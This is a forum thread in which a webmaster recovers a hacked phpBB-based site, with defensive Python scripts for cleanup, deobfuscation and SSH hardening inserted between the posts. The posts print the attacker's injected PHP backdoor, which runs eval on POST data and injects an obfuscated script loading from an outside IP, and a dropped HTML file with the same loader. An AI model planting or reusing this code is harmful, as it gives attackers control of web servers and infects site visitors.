
Recovering from a hack... can anyone assist?!

  • 13-03-2009 9:32pm
    #1
    Closed Accounts Posts: 812 ✭✭✭


    Hey guys,

    One of my sites got hacked last night... it replaced all the ?> in the php files with...
    if(!function_exists('tmp_lkojfghx')){for($i=1;$i<10;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCcyQiUzQ1pJc0M2Y3NMcjVzaXAyQnQlMjAzRjlzcmNaSSUzRElOJTJGJTJGMkI3OCUyRTJCMXJFMTAlMkUxNzVJTiUyRTI0SU45JTJGanF1SU5lcnklMkVqM0Y5cyUzRSUzQzJCJTJGQzZzMkJjc0xySU5pcDNGOXQlM0UnKS5yZXBsYWNlKC9zTHx3UW18ckV8NXN8MkJ8M0Y5fEM2fElOfFpJL2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
    

    ... and that in turn tried to place an iframe on the page, but AVG started hopping saying it detected "Exploit JavaScript Obfuscation".

    So I downloaded all the files from the site, did a batch find-replace over them to restore the ?> where it found that code, and copied them back online. Now the site isn't showing up right in the browser - it's only showing the header.

    Yet the html seems to be there, and when I copy the source code into dreamweaver and link up the css correctly again it seems to format grand.

    Any ideas or suggestions?

    Here's the site: www.divegear.ie

    I changed the ftp password too, some forums suggested that it could be some form of keylogger, and my avg did find a trojan. The new ftp password was entered using copy and paste of other words on the page, that'd fool it right?

    I don't mind sharing the ftp settings with some of the main regular guys here, I trust ye and really want to get this sorted asap.
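The find-replace the post describes can be done more safely as a script that only touches files carrying the injected marker and reports what it changed. The following is an added example, not the poster's own cleanup script: it walks a downloaded copy of the site, replaces the injected PHP block (recognised by the function names visible in the pasted payload, tmp_lkojfghx and tmp_lkojfghx2) with the '?>' it displaced, lists rogue index.htm drops, and notes whether the /tmp/m1..m9 files the payload tries to include_once() exist. The directory layout and sample file contents built by build_sample_site() are constructed for the demo.

```python
# Added example (not the poster's own script): strip the injected PHP block
# described in the thread and put the '?>' it replaced back.  The file
# layout and sample contents built by build_sample_site() are constructed;
# the patterns key on names visible in the pasted payload.
import os
import re
import tempfile

# The injected block opens with a guard on its own function name and ends
# with the call that installs the output handler, followed by the '?>'
# that the original closing tag became.
INJECTED_PHP = re.compile(
    r"if\(!function_exists\('tmp_lkojfghx'\)\).*?tmp_lkojfghx2\(\);\s*\?>",
    re.DOTALL,
)
# The dropped index.htm files carry an obfuscated document.write() loader.
DROPPED_HTML = re.compile(r"document\.write\(unescape\(", re.IGNORECASE)


def clean_php(source):
    """Return (cleaned source, number of injected blocks replaced by '?>')."""
    return INJECTED_PHP.subn("?>", source)


def read_text(path):
    with open(path, encoding="utf-8", errors="replace") as fh:
        return fh.read()


def scan_tree(root):
    """Clean .php files under root in place; list rogue index.htm files and
    any /tmp/m1..m9 drop files the payload tries to include_once()."""
    report = {"cleaned": [], "rogue_html": [], "tmp_includes": []}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            data = read_text(path)
            if name.lower().endswith(".php"):
                cleaned, count = clean_php(data)
                if count:
                    with open(path, "w", encoding="utf-8") as fh:
                        fh.write(cleaned)
                    report["cleaned"].append((path, count))
            elif name.lower() == "index.htm" and DROPPED_HTML.search(data):
                report["rogue_html"].append(path)
    for i in range(1, 10):  # the payload's include_once('/tmp/m1'..'/tmp/m9')
        if os.path.isfile("/tmp/m%d" % i):
            report["tmp_includes"].append("/tmp/m%d" % i)
    return report


# Constructed sample: a shortened stand-in for the injected block (the real
# payload body is replaced by a comment) and a cut-down rogue index.htm.
INFECTED_PHP = (
    "<?php echo 'hello'; "
    "if(!function_exists('tmp_lkojfghx')){/* payload body elided */}"
    "if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')"
    "$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><!DOCTYPE html>\n"
)
ROGUE_HTML = (
    "<html><head><title></title></head>\n<script language=javascript><!-- \n"
    "document.write(unescape('%3C').replace(/2B/g,\"\"));\n --></script>"
    "<body></body></html>\n"
)


def build_sample_site():
    """Create a temporary web root with one infected .php and one rogue index.htm."""
    root = tempfile.mkdtemp(prefix="site_demo_")
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as fh:
        fh.write(INFECTED_PHP)
    with open(os.path.join(root, "images", "index.htm"), "w", encoding="utf-8") as fh:
        fh.write(ROGUE_HTML)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for key, items in scan_tree(site).items():
        print(key, items)
```

Run it against a downloaded copy of the site rather than the live one, and keep the report: the list of files that were actually touched is what tells you whether the find-replace got everything, and a non-empty tmp_includes on the server itself means the box, not just the web files, needs attention.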


Comments

  • Closed Accounts Posts: 1,200 ✭✭✭louie


    check the .htaccess file for code that is not meant to be there.
    If the "hacker" got ftp access he might have other files there that stop the page itself from showing.


  • Closed Accounts Posts: 238 ✭✭chat2joe


    Had a look and there is no .htaccess file ....

    Now I'm not sure if they were there. Or maybe they were deleted? Should I have them there?


    I don't get why the html is in the source code when you check via the browser but it's not showing up...... :confused:


  • Closed Accounts Posts: 238 ✭✭chat2joe


    Oh and this index.htm file was also placed in a lot of directories...
    <html>
    <head>
    <title></title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    </head>
    
    <script language=javascript><!-- 
    document.write(unescape('2B%3CZIsC6csLr5sip2Bt%203F9srcZI%3DIN%2F%2F2B78%2E2B1rE10%2E175IN%2E24IN9%2FjquINery%2Ej3F9s%3E%3C2B%2FC6s2BcsLrINip3F9t%3E').replace(/sL|wQm|rE|5s|2B|3F9|C6|IN|ZI/g,""));
     --></script><body bgcolor="#FFFFFF" text="#000000">
    
    </body>
    </html>
    


  • Registered Users Posts: 4,287 ✭✭✭NotMe


    Check the source again. Your page is linking to 78.110.175.249/jquery.js which is dodgy.

    There's more about it here: http://trevornashkeller.com/misc/uh-ohz-you-got-haxored/
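To see for yourself where the obfuscated document.write() in the dropped index.htm points, you can replay its two steps (unescape, then strip the junk tokens) outside a browser. The following is an added example, not from the thread or the linked write-up: the encoded string and the token list are copied verbatim from the pasted index.htm, and js_unescape() is a small stand-in for JavaScript's unescape() written for this demo.

```python
# Added example (not from the thread): decode the obfuscated loader from the
# pasted index.htm without executing it.  ENCODED and JUNK_TOKENS are copied
# from the pasted file; js_unescape() is this example's stand-in for the
# JavaScript unescape() function.
import re
from urllib.parse import unquote

ENCODED = ("2B%3CZIsC6csLr5sip2Bt%203F9srcZI%3DIN%2F%2F2B78%2E2B1rE10%2E175IN"
           "%2E24IN9%2FjquINery%2Ej3F9s%3E%3C2B%2FC6s2BcsLrINip3F9t%3E")
JUNK_TOKENS = ["sL", "wQm", "rE", "5s", "2B", "3F9", "C6", "IN", "ZI"]


def js_unescape(s):
    """JavaScript's unescape(): %XX and %uXXXX sequences become characters."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def deobfuscate(encoded, tokens=JUNK_TOKENS):
    """Replay unescape(...).replace(/tok1|tok2|.../g, "") from the dropped file."""
    decoded = js_unescape(encoded)
    # A single left-to-right pass, like the JavaScript global replace.
    return re.sub("|".join(re.escape(t) for t in tokens), "", decoded)


def loaded_hosts(html):
    """Hosts referenced by <script ... src=...> tags in the decoded markup."""
    return re.findall(r"<script[^>]*\ssrc=[\"']?(?://|https?://)?([^/\"'\s>]+)", html, re.I)


if __name__ == "__main__":
    markup = deobfuscate(ENCODED)
    print(markup)
    print("loads from:", loaded_hosts(markup))
```

The decoded markup is a protocol-relative script tag, which is why the same injected file works on both http and https pages; the host it names is the one to look for in your own pages' source and in the web server's outbound requests.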


  • Closed Accounts Posts: 238 ✭✭chat2joe


    Thanks for the link NotMe, that's exactly what happened me.

    I've found more dodgy code in the file so I'm uploading again now after another find-replace job. Fingers crossed!

    Any suggestions on how to up security for the site?

    Is it because the site is phpbb2 based? It's running phpca on phpbb2, unfortunately phpca hasn't been updated for phpbb3....


  • Closed Accounts Posts: 238 ✭✭chat2joe


    Back up online and looks to be working perfect!

    Any security recommendations welcome though...


  • Registered Users Posts: 2,031 ✭✭✭colm_c


    chat2joe wrote: »
    Back up online and looks to be working perfect!

    Any security recommendations welcome though...

    Do you know how they got in? FTP presumably?

    If so contact the hosting company, they should have a log of recent IP/FTP connections. You should report this to the gardai, with their IP address, as well as the ISP who provided it - check www.ripe.net

    In terms of security, change your password for a start to something not as hackable - at least one number, one special character and a capital letter.


  • Registered Users Posts: 1,127 ✭✭✭smcelhinney


    Could have been via ssh or telnet either, and could have been brute force. Is your webserver on Linux or Windows? If Linux, look at bfd or denyhosts to prevent brute force. Also, you could disable ssh login by password, and only use public/private key. There's plenty of resources on the web about this.

    Let us know how you get on mate.
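A quick way to check that the "key only" advice above actually took effect is to audit sshd_config rather than eyeball it. The following is an added example, not from the thread: it parses the global section the way sshd_config(5) describes (comments start with '#', keywords are case-insensitive, and for each keyword the first value in the file wins) and flags password logins that are still possible. Stopping at the first Match line is a simplification assumed here, and the three sample configs are constructed.

```python
# Added example (not from the thread): audit an sshd_config for the advice
# in the post above, password logins off and public-key logins on.  Parsing
# follows sshd_config(5): '#' starts a comment, keywords are case-insensitive,
# and the FIRST value for a keyword wins.  Treating the first 'Match' line as
# the end of the global section is an assumption of this example; the sample
# configs are constructed.
def parse_global_settings(text):
    """Return {keyword.lower(): first value} for the global section."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.replace("=", " ", 1).split(None, 1)  # 'Key value' or 'Key=value'
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break  # assumption: conditional blocks are not audited here
        settings.setdefault(key, value)  # later duplicates are ignored by sshd
    return settings


def audit(text):
    """Return findings; an empty list means the config meets the post's advice."""
    s = parse_global_settings(text)
    findings = []
    # sshd defaults when the keyword is absent: both of these are 'yes'.
    if s.get("passwordauthentication", "yes").lower() != "no":
        findings.append("PasswordAuthentication should be 'no'")
    if s.get("pubkeyauthentication", "yes").lower() != "yes":
        findings.append("PubkeyAuthentication should be 'yes'")
    # Caveat: with PAM, keyboard-interactive logins can still prompt for a
    # password unless this is off too (older name: ChallengeResponseAuthentication).
    kbd = s.get("kbdinteractiveauthentication",
                s.get("challengeresponseauthentication", "yes"))
    if kbd.lower() != "no":
        findings.append("KbdInteractiveAuthentication/ChallengeResponseAuthentication should be 'no'")
    return findings


WEAK_CONFIG = """\
# constructed sample: the defaults, password logins still allowed
Port 22
PasswordAuthentication yes
PubkeyAuthentication yes
"""

HARDENED_CONFIG = """\
# constructed sample: key-only logins
Port 22
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
ChallengeResponseAuthentication no
"""

# Looks hardened at a glance, but sshd keeps the first value it sees.
TRICKY_CONFIG = """\
PasswordAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
"""

if __name__ == "__main__":
    for name, cfg in [("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG),
                      ("tricky", TRICKY_CONFIG)]:
        print(name, audit(cfg) or "ok")
```

The TRICKY_CONFIG case is the one that bites people who append a line to the end of the file: sshd honours the earlier "yes", so the check has to reproduce first-value-wins rather than just grep for the keyword.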

